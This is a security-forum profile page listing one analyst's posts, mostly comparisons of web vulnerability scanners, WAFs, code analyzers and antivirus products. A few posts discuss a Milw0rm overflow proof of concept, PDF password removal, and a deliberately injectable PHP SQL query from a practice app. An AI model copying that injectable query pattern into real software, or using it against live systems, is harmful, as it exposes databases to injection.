Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This is a place for us to start seriously talking about vendors. Who's great, who's not, what's it cost, how does it relate to their competitors and would we buy it? A place to talk about snakeoil, and brilliant products alike. Marketing fluff is forbidden. 

Current Page: 1 of 1
Results 1 - 15 of 15
4 years ago
br0kan
Here is a good mapping of the WASC Threat Classification v2.0 to the 2010 OWASP Top Ten Vulnerabilities as well. http://2.bp.blogspot.com/_JdybrokZBAk/S0Nt5DVYHWI/AAAAAAAABvU/HXQSzzoRJu0/s1600-h/WASC.png
Forum: News and Links
4 years ago
br0kan
Well you've got a lot of options here if you're welling to pay...here are a few (in no particular order) 1. IBM Rational AppScan (multiple versions) 2. HP WebInspect (multiple versions) 3. Cenzic Hailstorm (multiple versions) 4. Acuenetix WVS 5. NT Objectives NTOspider 6. nStalker Enterprise Edition 7. Burp Proxy If I were you I would also strongly consider WhiteHat Sentinel, despite
Forum: Vendor Talk
4 years ago
br0kan
I know the NetScaler Web App. Firewall farely well. It's a quality WAF, it's very similar to F5's BIG-IP Application Security Module as it adds on to NetScaler much the same way that ASM adds onto Big-IP. Imperva has a more complete model with DB protection on top of just the WAF. What are you looking to use it for?
Forum: Vendor Talk
5 years ago
br0kan
The HP AppSec group (*cough SPI Dynamics) released a Flash app. automated vuln. scanner last week. It's not a bad tool. It basically pulls down the the Flash swf file, then it more or less reverse engineers the file before finally performing source code analysis on the the disassembled code. Basically it combines Flasm with something like RATS. It's a lot simpler than it sounds. You can dow
Forum: News and Links
5 years ago
br0kan
Does anybody have any thoughts on Fortify vs. Ounce vs Klockwork vs. Coverity? Preferred choice?
Forum: Vendor Talk
5 years ago
br0kan
I think you need to be a little more specific. What exactly are you trying to accomplish? If nothing in particular, then take a hammer and hit the router as hard as you can for 10 minutes. This will accomplish a very effective denial of service.
Forum: Networking
5 years ago
br0kan
Thanks...I'm still wondering exactly what that means when they say they "decyrpt" the document though. Does that mean that PDF encryption uses weak keys? Or does that mean when you put the PDF document into HEX there are a few areas that you need to tweak. I don't really want to mess with it too much though (isn't that what Dimitri went to jail for?) I'm just curious. Thanks for th
Forum: Networking
5 years ago
br0kan
This topic didn't really fit anywhere and it is somewhat of a tangent. Regardless, I was wondering if anyone could explain how/why PDF password removal is possible in some cases. I know there are a multitude of tools out there to do it and understand that it is easy to do. What I am curious about is what exactly it is that those tools are doing. Also I'm not interested in anything that has t
Forum: Networking
5 years ago
br0kan
Yeah I used eEye Retina about 4 years ago but ran into some problems when I tried to put out to an enterprise solution. REM was pretty buggy at the time, but they made some pretty significant changes so that's not really an issue anymore I don't think, but I wanted to get others thoughts on it. Has anyone used the eEye web app. product?
Forum: Vendor Talk
5 years ago
br0kan
Sorry I am seeing this posting late. Did you get these answers? If not, I have them but will probably have to give them over E-mail/phone.
Forum: Vendor Talk
5 years ago
br0kan
Interestingly enough I just did an assessment of their product. I actually really liked it. It was pretty simple to install as a desktop solution and I agree the interface was pretty slick, it would work well from a SaaS perspective. From a desktop/server perspective, it was pretty nice, I've lost a lot of faith in Nessus as of lately as I've had some problems with it as of late. I also enjoy O
Forum: Vendor Talk
6 years ago
br0kan
I've been using Trend for awhile now and really like it. I think that running any AV is going to have issues that it catches and misses. In fact AV is hardly even close to my primary defense mechanism when it comes to issues. It's more like the Alamo for me. It's a line of defense but I know it's eventually going to fall if tested to hard. Regardless, if you are trying to run a personal bak
Forum: Vendor Talk
6 years ago
br0kan
Has anyone been able to get the POC code working that's listed as an overflow on Milw0rm? It's an overflow in the TITLE tag so that it is supposed to run calc.exe when you click save as. Doesn't seem to work for me though and I'm not 100% sure why.
Forum: News and Links
6 years ago
br0kan
So I was given a practice application that I'm having problems SQL injecting the search query. I'll be honest I'm not great with SQL and I regularly mess up the syntax. The code is as follows $sql = "SELECT alpha, bravo, charlie, delta FROM thedb WHERE '$query' IN (alpha, bravo, charlie); I know that I can inject it...I just can't get the syntax right for some reason...can someone help
Forum: SQL and Code Injection
6 years ago
br0kan
15. Hey all
I work as a security analyst who assesses and determines application security risks. I also get to work a lot with the application security vendors...so I have some insight. But I'm mostly hoping to get everyone else's.
Forum: Intro
Current Page: 1 of 1